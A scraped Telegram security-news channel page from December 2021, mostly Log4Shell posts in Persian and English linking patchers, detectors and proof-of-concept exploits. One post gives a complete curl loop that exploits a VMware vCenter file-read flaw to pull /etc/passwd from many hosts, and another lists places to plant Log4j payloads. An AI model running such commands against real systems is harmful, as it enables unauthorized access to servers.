Get Mystery Box with random crypto!

Security alert

Logo of telegram channel alert_security — Security alert S
Logo of telegram channel alert_security — Security alert
Channel address: @alert_security
Categories: Technologies
Language: English
Subscribers: 1.81K
Description from channel

🚨🚨🚨Latest news
🛡security incidences
🔧The latest tools and articles in the field of cyber security
💾The latest Premium Courses
📂 Open Source Tools

Ratings & Reviews

4.33

3 reviews

Reviews can be left only by registered users. All reviews are moderated by admins.

5 stars

1

4 stars

2

3 stars

0

2 stars

0

1 stars

0


The latest Messages 20

2021-12-13 15:16:18

و سیل حملاتی باج افزاری در پی #Log4j

گزارش ها نشون میده متاسفانه بیزینس های زیادی هنوز دارن از سیستم های قدیمی استفاده میکنن و یا هنوز این آسیب پذیری رو رفع نکردن !

@Alert_Security
866 viewsedited  12:16
Open / Comment
2021-12-13 01:47:37 Title: log4j-patcher
Description: Java Agent that disables Apache Log4J's JNDI Lookup. Quick-fix for CVE-2021-44228
Url: https://github.com/alerithe/log4j-patcher

@Alert_Security

Title: log4j-shell-poc
Description: A Proof-Of-Concept for the recently found CVE-2021-44228 vulnerability.
Url: https://github.com/kozmer/log4j-shell-poc

@Alert_Security

Title: cloudrasp-log4j2
Description: A Runtime Application Self-Protection module specifically designed for log4j2 RCE (CVE-2021-44228) defense.
Url: https://github.com/boundaryx/cloudrasp-log4j2

@Alert_Security

Title: Minecraft Log4j Honeypot
Description: Minecraft Honeypot for Log4j exploit. CVE-2021-44228 Log4Shell LogJam
Url: https://github.com/Adikso/minecraft-log4j-honeypot

@Alert_Security

Title: Log4j2-RCE
Description: Log4j2 CVE-2021-44228 Reproduction and echo utilization
Url: https://github.com/binganao/Log4j2-RCE

@Alert_Security

Title: jndi-ldap-test-server
Description: A minimalistic LDAP server that is meant for test vulnerability to JNDI+LDAP injection attacks in Java, especially CVE-2021-44228
Url: https://github.com/rakutentech/jndi-ldap-test-server

@Alert_Security

Title: sample-ldap-exploit
Description: A short demo of CVE-2021-44228
Url: https://github.com/phoswald/sample-ldap-exploit

@Alert_Security

Title: CVE-2021-44228-Apache-Log4j-Rce
Description: Apache Log4j Remote Code Execution
Url: https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce

@Alert_Security

Title: Log4j RCE CVE-2021-44228 Exploitation Detection
Url: https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b

@Alert_Security

Title: Python script to detect if an HTTP server is potentially vulnerable to the log4j 0day RCE
Url: https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6

@Alert_Security

Title: log4j2burpscanner
Description: CVE-2021-44228, log4j2 burp plug-in Java version, dnslog selected non-dnslog.cn domain names
Url: https://github.com/f0ng/log4j2burpscanner

@Alert_Security

Title: L4J-Vuln-Patch
Description: This tool patches the CVE-2021-44228 Log4J vulnerability present in all minecraft versions NOTE THIS TOOL MUST BE RE-RUN after downloading or updating versions of minecraft as its not a perminent patch
Url: https://github.com/jacobtread/L4J-Vuln-Patch

@Alert_Security

Title: log4j-vulnerability-patcher-agent
Description: Fixes CVE-2021-44228 in log4j by patching JndiLookup class
Url: https://github.com/saharNooby/log4j-vulnerability-patcher-agent


Title: log4shelldetect
Description: Scans files for .jars potentially vulnerable to Log4Shell (CVE-2021-44228) by inspecting the class paths inside the .jar.
Url: https://github.com/1lann/log4shelldetect


Title: CVE-2021-44228 DFIR-Notes
Url: https://github.com/Azeemering/CVE-2021-44228-DFIR-Notes


Title: LOG4J-POC
Description: LOG4J batch detection tool -- Red Team Tool -- Essential for net protection -- Redteam --
Url: https://github.com/XiaoBai-12138/LOG4J-POC


Title: CVE-2021-44228-PoC-log4j-bypass-words
Description: CVE-2021-44228 - LOG4J Java exploit - A trick to bypass words blocking patches
Url: https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words


Title: Log4Shell Mitigation tester
Description: Log4Shell CVE-2021-44228 mitigation tester
Url: https://github.com/lhotari/log4shell-mitigation-tester


Title: log4j-rce-detect-waf-bypass
Description: A Nuclei Template for Apache Log4j RCE (CVE-2021-44228) Detection with WAF Bypass Payloads
Url: https://github.com/toramanemre/log4j-rce-detect-waf-bypass


Title: jndiRep - CVE-2021-44228
Description: Scan your logs for CVE-2021-44228 related activity and report the attackers
Url: https://github.com/js-on/jndiRep
699 views22:47
Open / Comment
2021-12-12 15:13:42
Here are some ideas for potential attack surfaces for Log4J:

in your robots.txt Smirking face
in your dns records (txt...)
in your email headers
in your usernames
in your passwords
in your headers
in your e-mail addresses
in your files
in your SSL Certificates
in your EXIF
———————————————————————
@Alert_Security
781 views12:13
Open / Comment
2021-12-12 15:04:10 رقص با JWT و SSTI

در این ویدیو به بررسی و حل آخرین چالش وب از مسابقه کریسمس Cyber Santa از HackTheBox میپردازیم. (البته که به صورت لایو نه لوکال )

مدرس : نیما دباغی و محمد مهدی نیک پور






—————————————————————
کانال یوتیوب Nova رو حتما subscribe کنید
——————————————-———
@NovaSecurity
Novasecurity.net
588 views12:04
Open / Comment
2021-12-11 13:08:58

اخر هفته ی خوبی بود برای امنیت کارای سازمان ها :))))
#log4j
قشنگ تا یکی دو سال دهن سازمانا تو دنیا سرویسه

پ.ن: شاید خودتون ندونید ولی یه زمانی یه جایی ازش استفاده کردین
حالا بگردین پیداش کنین

نکته قابل توجه هم اینه که هکر میتونه یه پیلود ساده تست بزنه و کل سازمان رو بده هوا

@Alert_Security
1.0K views10:08
Open / Comment
2021-12-09 13:02:55
حل تمامی چالش های Web از ایونت آخر سال HackTheBox به اسم Cyber Santa

در این ویدیو ها با مهندس نیما دباغی همراه هستیم تا بریم برای حل و بررسی چالش های وب این ایونت

ویدیو بالا بخشی از حل چلنج سوم وب هستش
مشاهده کامل ویدیو در لینک زیر:




—————————————————————
کانال یوتیوب Nova رو حتما subscribe کنید
——————————————-———
@NovaSecurity
Novasecurity.net
850 views10:02
Open / Comment
2021-12-08 15:30:22

VMware vCenter (7.0.2.00100) unauth Arbitrary File Read + SSRF + Reflected XSS


cat target.txt| while read host do;do curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"| grep "root:x" && echo "$host Vulnerable";done

@Alert_Security
543 views12:30
Open / Comment
2021-12-02 15:03:58

اختلال شدید در زیرساخت اینترنت بین الملل !

گزارش کاربران حاکی از افت شدید سرعت و پهنای باند در اینترنت بین الملل میباشد.

شما میتونید در لحظه نظر خودتون رو از در این پست به اشتراک بگذارید.

@Alert_Security
93 viewsedited  12:03
Open / Comment
2021-12-02 14:01:57

زنجیره حملات گسترده با sms هایی از طرف قوه قضاییه!

کمپین گسترده فیشینگ گسترده با هدف قرار دادن کاربران ایرانی با ارسال پیامک های جعلی از قوه قضاییه و ایجاد زنجیره حمله Botnet برای ارسال sms و فروش کیت های آماده دسترسی از تارگت ها !

لینک مقاله تحلیل این کمپین فیشینگ و حمله Botnet در بلاگ نوا

—————————————————————————

@NovaSecurity
NovaSecurity.net
214 views11:01
Open / Comment
2021-12-02 11:20:08

https://github.com/l0ggg/VMware_vCenter

@Alert_Security
418 viewsedited  08:20
Open / Comment